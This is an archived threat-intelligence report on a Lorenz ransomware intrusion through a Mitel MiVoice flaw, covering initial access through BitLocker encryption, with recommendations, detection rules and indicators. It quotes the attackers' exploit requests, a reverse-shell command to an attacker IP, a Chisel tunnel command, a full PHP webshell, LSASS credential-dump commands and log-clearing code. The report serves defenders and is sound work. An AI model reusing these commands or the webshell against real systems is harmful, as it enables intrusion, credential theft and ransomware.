{
	"id": "e40facae-0f19-4300-a73a-d7c51d5e2183",
	"created_at": "2026-04-06T00:16:27.0084Z",
	"updated_at": "2026-04-10T13:11:18.782288Z",
	"deleted_at": null,
	"sha1_hash": "4f0719a9d313b41ca1b7625d4f51d4b6d6b51a4f",
	"title": "Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 161724,
	"plain_text": "Chiseling In: Lorenz Ransomware Group Cracks MiVoice And\r\nCalls Back For Free\r\nBy Markus Neis, Ross Phillips, Steven Campbell, Teresa Whitmore, Alex Ammons, and Arctic Wolf Labs Team\r\nPublished: 2022-09-12 · Archived: 2026-04-05 23:41:34 UTC\r\nKey Takeaways\r\nArctic Wolf Labs assesses with medium confidence that the Lorenz ransomware group exploited CVE-2022-29499 to compromise Mitel MiVoice Connect to gain initial access\r\nLorenz waited nearly a month after obtaining initial access to conduct additional activity\r\nLorenz exfiltrated data via FileZilla\r\nEncryption was done via BitLocker and Lorenz ransomware on ESXi\r\nLorenz employed a high degree of Operational Security (OPSEC)\r\nRansomware groups continue to use Living Off the Land Binaries (LOLBins) and gaining access to 0day\r\nexploits\r\nProcess and PowerShell Logging can significantly aid incident responders and potentially help decrypt\r\nencrypted files\r\nBackground\r\nThe Arctic Wolf Labs team recently investigated a Lorenz ransomware intrusion, which leveraged a Mitel\r\nMiVoice VoIP appliance vulnerability (CVE-2022-29499) for initial access and Microsoft’s BitLocker Drive\r\nEncryption for data encryption. Lorenz is a ransomware group that has been active since at least February 2021\r\nand like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems. Over\r\nthe last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United\r\nStates, with outliers in China and Mexico.\r\nMonitoring just critical assets is not enough for organizations, security teams should monitor all externally facing\r\ndevices for potential malicious activity, including VoIP and IoT devices. Threat actors are beginning to shift\r\ntargeting to lesser known or monitored assets to avoid detection. 
In the current landscape, many organizations\r\nheavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and IoT\r\ndevices without proper monitoring, which enables threat actors to gain a foothold into an environment without\r\nbeing detected.\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 1 of 13\n\nTechnical Analysis\r\nInitial Access\r\nInitial malicious activity originated from a Mitel appliance sitting on the network perimeter. Lorenz exploited\r\nCVE-2022-29499, a remote code execution vulnerability impacting the Mitel Service Appliance component of\r\nMiVoice Connect, to obtain a reverse shell and subsequently used Chisel as a tunnelling tool to pivot into the\r\nenvironment.\r\nIn late June, researchers at CrowdStrike published a blog article detailing the vulnerability and a suspected\r\nransomware intrusion attempt leveraging it for initial access. Although post-exploitation details were limited,\r\nArctic Wolf Labs observed significant overlap in the reported Tactics, Techniques, and Procedures (TTPs) tied to\r\ninitial access.\r\nThe following GET requests were observed, leading to successful exploitation of CVE-2022-29499:\r\n\"GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:137\r\n\"GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:137.184.181[.]252/$PWD|sh|? 
HTTP/1.0\" 200\r\nAfter successful exploitation, the threat actors leveraged cURL to download a shell script called wc2_deploy:\r\nGET //shoretel/wc2_deploy HTTP/1.1\r\nUser-Agent: curl/7.29.0\r\nHost: 137.184.181.252\r\nAccept: */*\r\nThe wc2_deploy shell script, when executed, establishes an SSL-encrypted reverse shell using living-off-the-land\r\ntechniques via the mkfifo command and OpenSSL.\r\nmkfifo /tmp/.svc_bkp_1; /bin/sh -i \u003c /tmp/.svc_bkp_1 2\u003e\u00261|\r\nopenssl s_client -quiet -connect 137.184.181[.]252:443 \u003e /tmp/.svc_bkp_1;\r\nrm /tmp/.svc_bkp_1\r\nA packet capture demonstrated that the reverse shell established on 137.184.181[.]252:443 was an ncat SSL\r\nlistener.\r\n\u003cSNIP\u003e\r\n`0...localhost0K..`.H...B.\r\n.\u003e.\u003cAutomatically generated by Ncat. See https://nmap.org/ncat/.0\r\n\u003c/SNIP\u003e\r\nPost-Exploitation Activity\r\nOnce a reverse shell was established, the threat actors made use of the Mitel device’s command line interface\r\n(stcli) to create a hidden directory and proceeded to download a compiled binary of the open source TCP\r\ntunneling tool Chisel directly from GitHub via wget. 
The threat actors renamed the Chisel binary to mem,\r\nunzipped it, and then executed it to establish a connection back to a Chisel server listening at\r\nhxxps[://]137.184.181[.]252[:]8443, skipping TLS certificate verification and turning the client into a SOCKS\r\nproxy for the threat actor.\r\nstcli\r\nsu\r\nmkdir /tmp/.coreDump/ \u0026\u0026 cd /tmp/.coreDump/ \u0026\u0026 wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_linux_386.gz -O /tmp/.coreDump/mem.gz \u0026\u0026 gzip -d /tmp/.coreDump/mem.gz \u0026\u0026 chmod 777 /tmp/.coreDump/mem \u0026\u0026 /tmp/.coreDump/mem client --tls-skip-verify --fingerprint '\u003cRedacted\u003e' https://137.184.181[.]252:8443 R:socks \u0026 exit\r\nContext: Chisel\r\nSHA256: 97ff99fd824a02106d20d167e2a2b647244712a558639524e7db1e6a2064a68d\r\nFilename: mem\r\nPersistence\r\nIt is worth noting that, after exploitation of the Mitel device, Lorenz did not immediately proceed with any further\r\nactivity for about a month. Upon returning to the Mitel device, the threat actors interacted with a webshell named\r\npdf_import_export.php located in the path /vhelp/pdf/en/. The webshell expects a triple-base64-encoded command\r\nsent via a POST request.\r\n\u003c?php if(isset($_POST[\"ucba\"])){try { $kka=$_POST[\"ucba\"];\r\n$lalldl=base64_decode(base64_decode(base64_decode($kka)));\r\n$handle = popen(\"$lalldl 2\u003e\u00261\", \"r\");\r\n$read = fread($handle, 2096);\r\necho base64_encode(base64_encode(base64_encode($read))).\"|\\n\";\r\npclose($handle); } catch (Exception $e) {}; };?\u003e\r\nContext: Webshell\r\nSHA256: 07838ac8fd5a59bb741aae0cf3abf48296677be7ac0864c4f124c2e168c0af94\r\nFilename: pdf_import_export.php\r\nWe have medium confidence that the webshell was placed onto the device during the initial exploitation. 
This is\r\nbased on no additional exploitation activity being observed upon returning to the Mitel device.\r\nShortly after interacting with the webshell, we observed the Mitel device initiate a reverse shell and Chisel tunnel\r\nagain, this time using 138.68.59[.]16[:]443 for the SSL ncat reverse shell and hxxps[://]138.68.59[.]16[:]8443 for\r\nChisel. Lorenz went on to leverage Chisel’s SOCKS functionality to pivot into the victim’s network.\r\nCredential Access\r\nThe threat actors relied heavily on CrackMapExec for follow-on activity through the SOCKS tunnel.\r\nCrackMapExec was first used to dump credentials remotely via comsvcs, implemented via the lsassy module. The\r\nmodule first identifies the PID of the Local Security Authority Subsystem Service (LSASS) and then creates a full\r\nLSASS memory dump.\r\nCmD.eXe /Q /c for /f \\\"tokens=1,2 delims= \\\" ^%A in ('\\\"tasklist /fi \\\"Imagename eq lsass.exe\\\"\r\n| find \\\"lsass\\\"\\\"')\r\ndo rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump ^%B \\\\Windows\\\\Temp\\\\kMekF.dbf full\r\nInvestigating PowerShell logs, we identified that this activity was quickly followed by Out-Minidump, which\r\nabuses Windows Error Reporting to dump LSASS memory and is, like comsvcs, implemented in CrackMapExec\r\nas part of the lsassy module.\r\npowErsHeLl.eXE -NoP $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorRepo\r\n;$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic');\r\n$Flags = [Reflection.BindingFlags] 'NonPublic, Static';\r\n$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags);\r\n$ProcessDumpPath = '\\Windows\\Temp\\bSpRLV.tar';\r\n$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create);\r\n$p=Get-Process lsass;\r\n$Result = $MiniDumpWriteDump.Invoke($null, @($p.Handle,$p.Id,$FileStream.SafeFileHandle,[UInt32] 
2,[I\r\n;$FileStream.Close()\r\nDiscovery\r\nAfter dumping credentials, the threat actors began network and domain enumeration activity. They first leveraged\r\ncertutil to identify the Active Directory Certificate Authorities (CAs) registered within the forest and the server\r\nhosting the service.\r\ncertutil --config - -ping\r\nnetsh was then used to display the firewall status, immediately followed by ipconfig to display the TCP/IP\r\nconfiguration for all adapters, followed by netstat to enumerate all active TCP connections.\r\nnetsh advfirewall show allprofiles state\r\nipconfig /all\r\nnetstat -anp tcp\r\nThe threat actors searched through compromised device directories looking for passwords by doing a recursive\r\nlisting of file contents and leveraging the Windows command findstr.\r\ncmd.exe /C Dir /s/b E:\\\\\u003cREDACTED\\\\ |findstr passw\r\nAdditionally, the threat actors checked for running instances of PowerShell.\r\ncmd.exe /C tasklist /v | findstr PowerShell.exe\r\nPrivilege Escalation and Lateral Movement\r\nLorenz obtained credentials for two privileged administrator accounts, one with local admin privileges and one\r\nwith domain admin privileges. These accounts were used to move laterally through the environment via RDP and\r\nsubsequently to a domain controller.\r\nExfiltration\r\nPrior to beginning encryption, the threat actors leveraged the compromised administrator accounts to install\r\nFileZilla. 
FileZilla was then used to exfiltrate data via SSH on port 22 to one of the following IP addresses:\r\nIP address | Country | ASN | ASN Organisation\r\n138.197.218[.]11 | US | 14061 | DIGITALOCEAN-ASN\r\n138.68.19[.]94 | US | 14061 | DIGITALOCEAN-ASN\r\n159.65.248[.]159 | US | 14061 | DIGITALOCEAN-ASN\r\n206.188.197[.]125 | NL | 399629 | BL Networks\r\n64.190.113[.]100 | US | 399629 | BL Networks\r\nEncryption\r\nLorenz leveraged Microsoft’s BitLocker Drive Encryption by creating a file called worm.txt and then executing\r\nthe file on the domain controller remotely via atexec.\r\ncmd.exe /C powershell.exe Get-Content C:\\\\\u003cRedacted\u003e\\worm.txt| PowerShell.exe -noprofile - \u003e C:\\\\Wind\r\nThrough existing PowerShell logging, we identified the contents of worm.txt, which contained PowerShell code to\r\nobtain a list of all computers and then remotely create a scheduled task named network. The scheduled task would\r\nobtain the contents from \\\\\u003cREDACTED-DOMAIN\u003e\\NETLOGON\\security_watermark.jpg and immediately run,\r\nstarting the encryption process.\r\n$cred = New-Object System.Management.Automation.PSCredential ('\u003cREDACTED-DOMAIN\u003e\\\u003cREDACTED-USER\u003e', $p\r\nBecause of its sensitivity, we can only provide some parts of network (which is actually a PowerShell script, not\r\na JPEG image).\r\nThe first portion of network adds multiple keys to the registry via the reg add command to prepare the devices for\r\nBitLocker encryption. The key RecoveryKeyMessage contained the unique Lorenz ransomware Tor URL to\r\nconduct negotiations between the threat actor and victim. 
The BitLocker recovery message would then be\r\ndisplayed on the pre-boot key recovery screen after the device was encrypted.\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseTPM /t REG_DWORD /d 2 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseTPMKey /t REG_DWORD /d 2 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseTPMKeyPIN /t REG_DWORD /d 2 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v RecoveryKeyMessage /t REG_SZ /d 'http://\u003cREDACTED\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /V RecoveryKeyMessageSource /t REG_DWORD /d 2 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseTPMPIN /t REG_DWORD /d 2 /f;\r\nNote: In some instances, the reg add command would fail if HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE did\r\nnot exist, inhibiting encryption on some devices.\r\nNext, security_watermark.jpg attempts to install BitLocker, including all role services and applicable management\r\ntools, via the Install-WindowsFeature cmdlet. This was followed by enabling BitLocker via the PowerShell cmdlet\r\nEnable-BitLocker.\r\nInstall-WindowsFeature BitLocker -IncludeAllSubFeature -IncludeManagementTools -Restart;\"enable-BitLo\r\nNote that the -password parameter contains an $UnsecurePassword string. Capturing the plaintext password allowed\r\nthe victim to decrypt nearly 95% of their encrypted endpoints.\r\nThe threat actors kept track of the encryption progress by sending an HTTP POST request to\r\nhxxp://206.188.197[.]125 (one of the IP addresses used for data exfiltration) via the Invoke-WebRequest cmdlet. 
The\r\nPOST request included the encryption progress displayed as a percentage.\r\nInvoke-WebRequest -Uri hxxp://206.188.197[.]125/ -Method POST -Body ($postParams| ConvertTo-Json);Wri\r\nAfter the encryption process, the script clears all event logs.\r\nGet-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }\r\nAlthough Lorenz primarily leveraged BitLocker for encryption, we observed a select few ESXi hosts with Lorenz\r\nransomware.\r\nRecommendations\r\nUpgrade to MiVoice Connect Version R19.3\r\nIn July 2022, Mitel released MiVoice Connect version R19.3, which fully remediates CVE-2022-29499. We\r\nrecommend upgrading to version R19.3 to prevent potential exploitation of this vulnerability. On April 19, 2022,\r\nMitel provided a script for releases 19.2 SP3 and earlier, and R14.x and earlier as a workaround before the release\r\nof R19.3.\r\nNote: Arctic Wolf recommends following change management best practices for deploying security patches,\r\nincluding testing changes in a dev environment before deploying to production to avoid operational impact.\r\nProduct | Impacted Versions | Fixed Version\r\nMiVoice Connect | R19.2 SP3 and earlier; R14.x and earlier | MiVoice Connect R19.3 (see Mitel Security Advisory)\r\nScan External Appliances and Web Applications\r\nExternal scans are an integral part of assessing your organization’s footprint and hardening your environment and\r\nsecurity posture. You cannot protect assets that you do not know about, and external scans can help your\r\norganization discover those assets. Furthermore, external scans can help define an organization’s attack surface\r\nacross devices exposed to the Internet.\r\nDo Not Expose Critical Assets Directly to the Internet\r\nUpon reviewing external scan results, ensure critical assets are not directly exposed to the Internet. If a device\r\ndoes not need to be on the perimeter, remove it. 
Removing a device from your network perimeter will reduce your\r\norganization’s attack surface.\r\nConfigure PowerShell Logging\r\nArctic Wolf Labs is continuously investigating attacks in which PowerShell was used extensively throughout all\r\nphases of the attack. We recommend turning on Module Logging, Script Block Logging, and Transcription\r\nLogging and sending logs to a centralised logging solution.\r\nConfigure Off-Site Logging\r\nAlways ensure that critical assets are monitored and that captured logs are stored externally to your organization.\r\nOtherwise, detailed forensic analysis options may be limited when threat actors take evasive actions to hide their\r\ntracks.\r\nBackups\r\nEstablish a tested online and offline backup strategy for data as well as gold images, and identify weak points a threat\r\nactor might exploit. Saving just one backup file will not be enough to ensure your data is protected and\r\nrecoverable.\r\nLimit the Blast Radius of Potential Attacks\r\nTo limit the amount of damage that would be inflicted in a potential attack, privileged credentials should never be\r\nexposed on lower-tier assets. By adhering to this principle, the likelihood that a threat actor would be able to\r\nsuccessfully gain access to a domain controller is reduced. 
Implementing logical network segmentation based on\r\nprivileges limits a threat actor’s ability to move laterally (e.g., restricting domain administrators from logging into\r\nworkstations).\r\nDetections\r\nNetwork Detections\r\nArctic Wolf Labs has created custom Suricata rules to aid in identification of the malicious activity described in\r\nthis blog.\r\nThe rules can be downloaded here: https://github.com/rtkwlf/wolf-tools/threat-intelligence/lorenz-ransomware-chiseling-in/lorenz-suricata.rules\r\nThe following Snort signatures available in Emerging Threats’ ET Community ruleset can also be used to detect\r\nrelevant activity:\r\n2037121 — ET EXPLOIT: Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)\r\n2001980 — ET POLICY: SSH Client Banner Detected on Unusual Port\r\nEndpoint Detections\r\nArctic Wolf Labs has created custom Yara rules to aid in identification of the malicious activity described in this\r\nblog.\r\nThe rules can be downloaded here: https://github.com/rtkwlf/wolf-tools/threat-intelligence/lorenz-ransomware-chiseling-in/lorenz-yara.yar\r\nThe following SIGMA rules shared by SigmaHQ can detect numerous endpoint TTPs used by Lorenz:\r\nProcess Dump via Comsvcs DLL\r\nAccessing WinAPI in PowerShell for Credentials Dumping\r\nRemote Task Creation via ATSVC Named Pipe\r\nPowerShell as a Service in Registry\r\nCrackMapExec Process Patterns\r\nEncoded PowerShell Command Line Usage of ConvertTo-SecureString\r\nIndicators of Compromise\r\nNote: A full copy of these IOCs can be downloaded as a CSV file here\r\nIndicator | Type | Context\r\n137.184.181[.]252 | IP Address | Used to exploit the Mitel device (CVE-2022-29499)\r\n138.197.218[.]11 | IP Address | Data exfiltration via FileZilla\r\n138.68.19[.]94 | IP Address | Data exfiltration via FileZilla\r\n138.68.59[.]16 | IP Address | Used to download Chisel\r\n159.65.248[.]159 | IP Address | Data exfiltration via FileZilla\r\n206.188.197[.]125 | IP Address | Data exfiltration via FileZilla; HTTP POST requests to notify threat actors of encryption progress\r\n64.190.113[.]100 | IP Address | Data exfiltration via FileZilla\r\n97ff99fd824a02106d20d167e2a2b647244712a558639524e7db1e6a2064a68d | SHA-256 | Chisel\r\n07838ac8fd5a59bb741aae0cf3abf48296677be7ac0864c4f124c2e168c0af94 | SHA-256 | Webshell\r\nATT\u0026CK Matrix\r\nTactic | ID | Name | Details\r\nInitial Access | T1190 | Exploit Public-Facing Application | Lorenz exploited CVE-2022-29499 on an exposed Mitel device, achieving Remote Code Execution (RCE).\r\nResource Development | T1588.002 | Obtain Capabilities – Tools | FileZilla was downloaded by Lorenz to exfiltrate data. Chisel, a TCP tunneling tool, was downloaded from GitHub by Lorenz.\r\nResource Development | T1587.001 | Develop Capabilities – Malware | Lorenz developed the BitLocker deployment script.\r\nPersistence | T1505.003 | Server Software Component – Webshell | Lorenz created a webshell on the vulnerable device for persistence.\r\nCommand \u0026 Control | T1095, T1090 | Non-Application Layer Protocol; Proxy | Chisel client was used to create a SOCKS5 connection over port 8443 to an attacker-controlled IP.\r\nCommand \u0026 Control | T1573 | Encrypted Channel | Reverse shell used a localhost TLS certificate for encryption.\r\nCredential Access | T1003.001 | LSASS Memory | CrackMapExec using lsassy to dump LSASS remotely.\r\nExecution | T1059.001, T1059.003 | Command and Scripting Interpreter – PowerShell; Command and Scripting Interpreter – Windows Command Shell | PowerShell and Windows command shell were both used to launch malware as well as interact with Windows utilities and native APIs.\r\nExecution | T1112 | Modify Registry | The deployment PowerShell script added registry keys that are required for BitLocker configuration.\r\nExecution | T1053.005 | Scheduled Task | atexec was used via Task Scheduler. The BitLocker encryption was initiated via Scheduled Task.\r\nDiscovery | T1016, T1518.001 | System Network Discovery; Security Software Discovery | Lorenz used various commands to gather network information (netstat, ipconfig, netsh, certutil, etc.)\r\nDiscovery | T1083 | File and Directory Discovery | Lorenz recursively searched through directories on the initially compromised device looking for passwords.\r\nPrivilege Escalation | T1078.002 | Domain Accounts | Lorenz obtained domain administrator credentials\r\nPrivilege Escalation | T1078.003 | Local Accounts | Lorenz obtained local administrator credentials\r\nLateral Movement | T1021.001, T1078.002, T1078.003 | Remote Services – Remote Desktop Protocol; Valid Accounts – Domain Accounts; Valid Accounts – Local Accounts | Lorenz used obtained local and domain administrator credentials to move laterally via RDP.\r\nData Exfiltration | T1048.002 | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | The data was exfiltrated to attacker-controlled IPs using FileZilla SFTP over port 22.\r\nImpact | T1486 | Data Encrypted for Impact | Lorenz leveraged BitLocker to encrypt systems. Lorenz encrypted ESXi.\r\nImpact | T1529 | System Shutdown/Reboot | The PowerShell script included a command to shutdown and restart host.\r\nDefense Evasion | T1070.001 | Indicator Removal on Host – Clear Windows Event Log | Event logs were cleared.\r\nDefense Evasion | T1027 | Obfuscated Files or Information | The BitLocker deployment PowerShell script had a JPG extension.\r\nReferences\r\nhttps://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002\r\nhttps://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/\r\nMarkus Neis\r\nMarkus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat\r\nresearch. He has more than a decade of experience in researching adversary tradecraft and responding to\r\nsophisticated attacks.\r\nRoss Phillips\r\nRoss is a Sr. Threat Intelligence Researcher at Arctic Wolf Labs with almost a decade of experience in the security\r\nlandscape. Prior to this, Ross worked as a Technical Lead for the Arctic Wolf SOC and an Internal Tech Resident\r\nat Google after graduating from Rochester Institute of Technology in 2012 majoring in Information Security \u0026\r\nForensics.\r\nSteven Campbell\r\nSteven Campbell is a Threat Intelligence Researcher at Arctic Wolf Labs and has more than eight years of\r\nexperience in intelligence analysis and security research. He has a strong background in infrastructure analysis and\r\nadversary tradecraft.\r\nTeresa Whitmore\r\nTeresa Whitmore is a Forensic Analyst at Tetra Defense, an Arctic Wolf company, focused on leading incident\r\nresponse and digital forensic investigations. She has more than a decade of combined experience in DFIR, cyber\r\ndefense operations, and malware analysis.\r\nAlex Ammons\r\nAlex Ammons is a forensics analyst at Tetra Defense, an Arctic Wolf company, and has numerous certifications\r\nand operational experience from the Department of Defense and National Security Agency. Alex is seasoned in\r\nincident response and offensive and defensive cyber operations. 
\r\nSource: https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/"
	],
	"report_names": [
		"lorenz-ransomware-chiseling-in"
	],
	"threat_actors": [],
	"ts_created_at": 1775434587,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f0719a9d313b41ca1b7625d4f51d4b6d6b51a4f.pdf",
		"text": "https://archive.orkl.eu/4f0719a9d313b41ca1b7625d4f51d4b6d6b51a4f.txt",
		"img": "https://archive.orkl.eu/4f0719a9d313b41ca1b7625d4f51d4b6d6b51a4f.jpg"
	}
}